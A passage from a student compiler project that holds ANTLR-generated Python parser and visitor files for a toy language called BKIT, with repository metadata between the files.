self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def expr0(self):\n return self.getTypedRuleContext(BKITParser.Expr0Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr0\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr0\" ):\n return visitor.visitExpr0(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr0(self):\n\n localctx = BKITParser.Expr0Context(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_expr0)\n try:\n self.state = 118\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,10,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 113\n self.expr1()\n self.state = 114\n self.match(BKITParser.PLUS_INT)\n self.state = 115\n self.expr0()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 117\n self.expr1()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr1\" ):\n return visitor.visitExpr1(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr1(self):\n\n localctx = BKITParser.Expr1Context(self, self._ctx, self.state)\n 
self.enterRule(localctx, 24, self.RULE_expr1)\n self._la = 0 # Token type\n try:\n self.state = 125\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,11,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 120\n self.expr2(0)\n self.state = 121\n _la = self._input.LA(1)\n if not(_la==BKITParser.MINUS_INT or _la==BKITParser.STAR_INT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 122\n self.expr1()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 124\n self.expr2(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def expr2(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr2Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr2Context,i)\n\n\n def DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr2\" ):\n return visitor.visitExpr2(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 26\n self.enterRecursionRule(localctx, 26, self.RULE_expr2, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 128\n self.operand()\n self._ctx.stop = self._input.LT(-1)\n self.state = 135\n self._errHandler.sync(self)\n 
_alt = self._interp.adaptivePredict(self._input,12,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 130\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 131\n self.match(BKITParser.DIV_INT)\n self.state = 132\n self.expr2(3) \n self.state = 137\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,12,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def Integer_literal(self):\n return self.getToken(BKITParser.Integer_literal, 0)\n\n def Float_literal(self):\n return self.getToken(BKITParser.Float_literal, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitOperand\" ):\n return visitor.visitOperand(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_operand)\n try:\n self.state = 142\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,13,self._ctx)\n if la_ == 1:\n 
self.enterOuterAlt(localctx, 1)\n self.state = 138\n self.match(BKITParser.Integer_literal)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 139\n self.match(BKITParser.Float_literal)\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 140\n self.match(BKITParser.ID)\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 141\n self.call_stmt()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ids_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ID)\n else:\n return self.getToken(BKITParser.ID, i)\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_ids_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitIds_list\" ):\n return visitor.visitIds_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def ids_list(self):\n\n localctx = BKITParser.Ids_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_ids_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 144\n self.match(BKITParser.ID)\n self.state = 149\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 145\n self.match(BKITParser.COMMA)\n self.state = 146\n self.match(BKITParser.ID)\n self.state = 151\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n 
self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT(self):\n return self.getToken(BKITParser.INT, 0)\n\n def FLOAT(self):\n return self.getToken(BKITParser.FLOAT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_type\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitPrimitive_type\" ):\n return visitor.visitPrimitive_type(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def primitive_type(self):\n\n localctx = BKITParser.Primitive_typeContext(self, self._ctx, self.state)\n self.enterRule(localctx, 32, self.RULE_primitive_type)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 152\n _la = self._input.LA(1)\n if not(_la==BKITParser.INT or _la==BKITParser.FLOAT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[13] = self.expr2_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.5010992288589478, "alphanum_fraction": 0.5517999529838562, "avg_line_length": 30.759824752807617, "blob_id": "97d9c1d47c00167fcdf3bb8b41ba16ee3139f7bd", "content_id": 
"fccfa73bafff1d282b2ae0f72d72f58eb65cbeb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7278, "license_type": "no_license", "max_line_length": 113, "num_lines": 229, "path": "/LexicalAnalysis/src/main/bkit/parser/.antlr/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/LexicalAnalysis/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\22\")\n buf.write(\"\\35\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\3\\2\\3\\2\\3\\2\\3\\3\\6\\3\\r\\n\\3\")\n buf.write(\"\\r\\3\\16\\3\\16\\3\\4\\6\\4\\22\\n\\4\\r\\4\\16\\4\\23\\3\\4\\6\\4\\27\\n\\4\")\n buf.write(\"\\r\\4\\16\\4\\30\\3\\4\\3\\4\\3\\4\\2\\2\\5\\2\\4\\6\\2\\3\\3\\2\\5\\6\\2\\34\")\n buf.write(\"\\2\\b\\3\\2\\2\\2\\4\\f\\3\\2\\2\\2\\6\\21\\3\\2\\2\\2\\b\\t\\7\\4\\2\\2\\t\\n\")\n buf.write(\"\\7\\2\\2\\3\\n\\3\\3\\2\\2\\2\\13\\r\\t\\2\\2\\2\\f\\13\\3\\2\\2\\2\\r\\16\\3\")\n buf.write(\"\\2\\2\\2\\16\\f\\3\\2\\2\\2\\16\\17\\3\\2\\2\\2\\17\\5\\3\\2\\2\\2\\20\\22\\7\")\n buf.write(\"\\3\\2\\2\\21\\20\\3\\2\\2\\2\\22\\23\\3\\2\\2\\2\\23\\21\\3\\2\\2\\2\\23\\24\")\n buf.write(\"\\3\\2\\2\\2\\24\\26\\3\\2\\2\\2\\25\\27\\7\\7\\2\\2\\26\\25\\3\\2\\2\\2\\27\")\n buf.write(\"\\30\\3\\2\\2\\2\\30\\26\\3\\2\\2\\2\\30\\31\\3\\2\\2\\2\\31\\32\\3\\2\\2\\2\")\n buf.write(\"\\32\\33\\7\\3\\2\\2\\33\\7\\3\\2\\2\\2\\5\\16\\23\\30\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = 
PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"'\\\"'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"<INVALID>\", \"VAR\", \"Real_number\", \"Integer_number\", \n \"String\", \"HEXADECIMAL\", \"DECIMAL\", \"OCTAL\", \"LETTER\", \n \"ID\", \"ILLEGAL_ESCAPE\", \"WS\", \"UNCLOSE_STRING\", \"ERROR_CHAR\", \n \"BLOCK_COMMENT\", \"UNTERMINATED_COMMENT\" ]\n\n RULE_program = 0\n RULE_number = 1\n RULE_string = 2\n\n ruleNames = [ \"program\", \"number\", \"string\" ]\n\n EOF = Token.EOF\n T__0=1\n VAR=2\n Real_number=3\n Integer_number=4\n String=5\n HEXADECIMAL=6\n DECIMAL=7\n OCTAL=8\n LETTER=9\n ID=10\n ILLEGAL_ESCAPE=11\n WS=12\n UNCLOSE_STRING=13\n ERROR_CHAR=14\n BLOCK_COMMENT=15\n UNTERMINATED_COMMENT=16\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 6\n self.match(BKITParser.VAR)\n self.state = 7\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class NumberContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, 
invokingState)\n self.parser = parser\n\n def Real_number(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.Real_number)\n else:\n return self.getToken(BKITParser.Real_number, i)\n\n def Integer_number(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.Integer_number)\n else:\n return self.getToken(BKITParser.Integer_number, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_number\n\n\n\n\n def number(self):\n\n localctx = BKITParser.NumberContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_number)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 10 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 9\n _la = self._input.LA(1)\n if not(_la==BKITParser.Real_number or _la==BKITParser.Integer_number):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 12 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.Real_number or _la==BKITParser.Integer_number):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StringContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def String(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.String)\n else:\n return self.getToken(BKITParser.String, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_string\n\n\n\n\n def string(self):\n\n localctx = BKITParser.StringContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_string)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 15 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while 
True:\n self.state = 14\n self.match(BKITParser.T__0)\n self.state = 17 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.T__0):\n break\n\n self.state = 20 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 19\n self.match(BKITParser.String)\n self.state = 22 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.String):\n break\n\n self.state = 24\n self.match(BKITParser.T__0)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n\n\n" }, { "alpha_fraction": 0.7233632802963257, "alphanum_fraction": 0.7275353074073792, "avg_line_length": 30.806121826171875, "blob_id": "dab7398bec80fb92b804d5efe81664dbcf76a8b2", "content_id": "ad9b87df206c9e6f00b7744cc88f35f4764fa2f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3116, "license_type": "no_license", "max_line_length": 88, "num_lines": 98, "path": "/SyntaxAnalysis/tut/target/main/bkit/parser/BKITVisitor.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nif __name__ is not None and \".\" in __name__:\n from .BKITParser import BKITParser\nelse:\n from BKITParser import BKITParser\n\n# This class defines a complete generic visitor for a parse tree produced by BKITParser.\n\nclass BKITVisitor(ParseTreeVisitor):\n\n # Visit a parse tree produced by BKITParser#program.\n def visitProgram(self, ctx:BKITParser.ProgramContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#var_declare.\n def visitVar_declare(self, ctx:BKITParser.Var_declareContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#function_declare.\n def visitFunction_declare(self, 
ctx:BKITParser.Function_declareContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#function_body.\n def visitFunction_body(self, ctx:BKITParser.Function_bodyContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#ids_list_with_type.\n def visitIds_list_with_type(self, ctx:BKITParser.Ids_list_with_typeContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#stmt.\n def visitStmt(self, ctx:BKITParser.StmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#assign_stmt.\n def visitAssign_stmt(self, ctx:BKITParser.Assign_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#call_stmt.\n def visitCall_stmt(self, ctx:BKITParser.Call_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#ret_stmt.\n def visitRet_stmt(self, ctx:BKITParser.Ret_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr.\n def visitExpr(self, ctx:BKITParser.ExprContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#subexpr.\n def visitSubexpr(self, ctx:BKITParser.SubexprContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr0.\n def visitExpr0(self, ctx:BKITParser.Expr0Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr1.\n def visitExpr1(self, ctx:BKITParser.Expr1Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr2.\n def visitExpr2(self, ctx:BKITParser.Expr2Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#operand.\n def visitOperand(self, ctx:BKITParser.OperandContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#ids_list.\n def visitIds_list(self, 
ctx:BKITParser.Ids_listContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#primitive_type.\n def visitPrimitive_type(self, ctx:BKITParser.Primitive_typeContext):\n return self.visitChildren(ctx)\n\n\n\ndel BKITParser" }, { "alpha_fraction": 0.49288564920425415, "alphanum_fraction": 0.5542108416557312, "avg_line_length": 34.244293212890625, "blob_id": "17f640b06414f57e9c6ee00f09878e98374d8b13", "content_id": "e3cc40208650ad6c2bc5ff2695948dd70eae200e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 114276, "license_type": "no_license", "max_line_length": 446, "num_lines": 3242, "path": "/Assignments/assignment1/src/forJava/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3S\")\n buf.write(\"\\u01bb\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\\t\\23\")\n buf.write(\"\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\")\n buf.write(\"\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\")\n buf.write(\"\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\\4&\\t\")\n buf.write(\"&\\4\\'\\t\\'\\3\\2\\3\\2\\3\\2\\7\\2R\\n\\2\\f\\2\\16\\2U\\13\\2\\3\\2\\7\\2\")\n buf.write(\"X\\n\\2\\f\\2\\16\\2[\\13\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\")\n 
buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\5\\4i\\n\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\7\\4p\\n\\4\\f\")\n buf.write(\"\\4\\16\\4s\\13\\4\\3\\4\\7\\4v\\n\\4\\f\\4\\16\\4y\\13\\4\\3\\4\\3\\4\\3\\4\")\n buf.write(\"\\3\\5\\3\\5\\3\\5\\7\\5\\u0081\\n\\5\\f\\5\\16\\5\\u0084\\13\\5\\3\\5\\7\\5\")\n buf.write(\"\\u0087\\n\\5\\f\\5\\16\\5\\u008a\\13\\5\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\")\n buf.write(\"\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\5\")\n buf.write(\"\\6\\u009f\\n\\6\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\7\\7\\u00aa\")\n buf.write(\"\\n\\7\\f\\7\\16\\7\\u00ad\\13\\7\\3\\7\\3\\7\\5\\7\\u00b1\\n\\7\\3\\7\\3\\7\")\n buf.write(\"\\3\\7\\3\\b\\3\\b\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\")\n buf.write(\"\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\3\\13\\3\")\n buf.write(\"\\13\\3\\13\\3\\13\\3\\13\\3\\13\\3\\13\\3\\f\\3\\f\\5\\f\\u00d7\\n\\f\\3\\f\")\n buf.write(\"\\3\\f\\3\\f\\3\\r\\3\\r\\3\\16\\3\\16\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\7\")\n buf.write(\"\\17\\u00e5\\n\\17\\f\\17\\16\\17\\u00e8\\13\\17\\7\\17\\u00ea\\n\\17\")\n buf.write(\"\\f\\17\\16\\17\\u00ed\\13\\17\\3\\17\\3\\17\\3\\20\\3\\20\\5\\20\\u00f3\")\n buf.write(\"\\n\\20\\3\\21\\3\\21\\3\\21\\3\\21\\3\\21\\5\\21\\u00fa\\n\\21\\3\\22\\3\")\n buf.write(\"\\22\\3\\22\\3\\22\\3\\22\\3\\22\\7\\22\\u0102\\n\\22\\f\\22\\16\\22\\u0105\")\n buf.write(\"\\13\\22\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\7\\23\\u010d\\n\\23\\f\")\n buf.write(\"\\23\\16\\23\\u0110\\13\\23\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\7\")\n buf.write(\"\\24\\u0118\\n\\24\\f\\24\\16\\24\\u011b\\13\\24\\3\\25\\3\\25\\3\\25\\5\")\n buf.write(\"\\25\\u0120\\n\\25\\3\\26\\3\\26\\3\\26\\5\\26\\u0125\\n\\26\\3\\27\\3\\27\")\n buf.write(\"\\5\\27\\u0129\\n\\27\\3\\30\\3\\30\\3\\30\\3\\30\\3\\30\\6\\30\\u0130\\n\")\n buf.write(\"\\30\\r\\30\\16\\30\\u0131\\3\\31\\3\\31\\5\\31\\u0136\\n\\31\\3\\32\\3\")\n 
buf.write(\"\\32\\3\\32\\3\\32\\3\\32\\5\\32\\u013d\\n\\32\\3\\33\\3\\33\\3\\33\\5\\33\")\n buf.write(\"\\u0142\\n\\33\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\7\\34\\u0149\\n\\34\\f\")\n buf.write(\"\\34\\16\\34\\u014c\\13\\34\\7\\34\\u014e\\n\\34\\f\\34\\16\\34\\u0151\")\n buf.write(\"\\13\\34\\3\\34\\3\\34\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\")\n buf.write(\"\\35\\3\\35\\5\\35\\u015e\\n\\35\\3\\36\\3\\36\\3\\36\\3\\36\\3\\37\\3\\37\")\n buf.write(\"\\3 \\3 \\3 \\5 \\u0169\\n \\3 \\3 \\3 \\5 \\u016e\\n \\7 \\u0170\\n\")\n buf.write(\" \\f \\16 \\u0173\\13 \\5 \\u0175\\n \\3 \\3 \\3!\\3!\\5!\\u017b\\n\")\n buf.write(\"!\\3!\\3!\\3!\\5!\\u0180\\n!\\7!\\u0182\\n!\\f!\\16!\\u0185\\13!\\3\")\n buf.write(\"\\\"\\3\\\"\\3\\\"\\3\\\"\\6\\\"\\u018b\\n\\\"\\r\\\"\\16\\\"\\u018c\\3\\\"\\5\\\"\\u0190\")\n buf.write(\"\\n\\\"\\3\\\"\\3\\\"\\3\\\"\\5\\\"\\u0195\\n\\\"\\3#\\3#\\3#\\3#\\6#\\u019b\\n\")\n buf.write(\"#\\r#\\16#\\u019c\\3#\\5#\\u01a0\\n#\\3$\\3$\\3$\\3$\\3$\\6$\\u01a7\")\n buf.write(\"\\n$\\r$\\16$\\u01a8\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\7\")\n buf.write(\"\\'\\u01b6\\n\\'\\f\\'\\16\\'\\u01b9\\13\\'\\3\\'\\2\\5\\\"$&(\\2\\4\\6\\b\")\n buf.write(\"\\n\\f\\16\\20\\22\\24\\26\\30\\32\\34\\36 \\\"$&(*,.\\60\\62\\64\\668\")\n buf.write(\":<>@BDFHJL\\2\\3\\3\\2\\n\\r\\2\\u01c6\\2S\\3\\2\\2\\2\\4^\\3\\2\\2\\2\\6\")\n buf.write(\"b\\3\\2\\2\\2\\b\\u0082\\3\\2\\2\\2\\n\\u009e\\3\\2\\2\\2\\f\\u00a0\\3\\2\")\n buf.write(\"\\2\\2\\16\\u00b5\\3\\2\\2\\2\\20\\u00b7\\3\\2\\2\\2\\22\\u00c6\\3\\2\\2\")\n buf.write(\"\\2\\24\\u00cd\\3\\2\\2\\2\\26\\u00d6\\3\\2\\2\\2\\30\\u00db\\3\\2\\2\\2\")\n buf.write(\"\\32\\u00dd\\3\\2\\2\\2\\34\\u00df\\3\\2\\2\\2\\36\\u00f0\\3\\2\\2\\2 \\u00f9\")\n buf.write(\"\\3\\2\\2\\2\\\"\\u00fb\\3\\2\\2\\2$\\u0106\\3\\2\\2\\2&\\u0111\\3\\2\\2\\2\")\n buf.write(\"(\\u011f\\3\\2\\2\\2*\\u0124\\3\\2\\2\\2,\\u0128\\3\\2\\2\\2.\\u012a\\3\")\n buf.write(\"\\2\\2\\2\\60\\u0135\\3\\2\\2\\2\\62\\u013c\\3\\2\\2\\2\\64\\u0141\\3\\2\")\n 
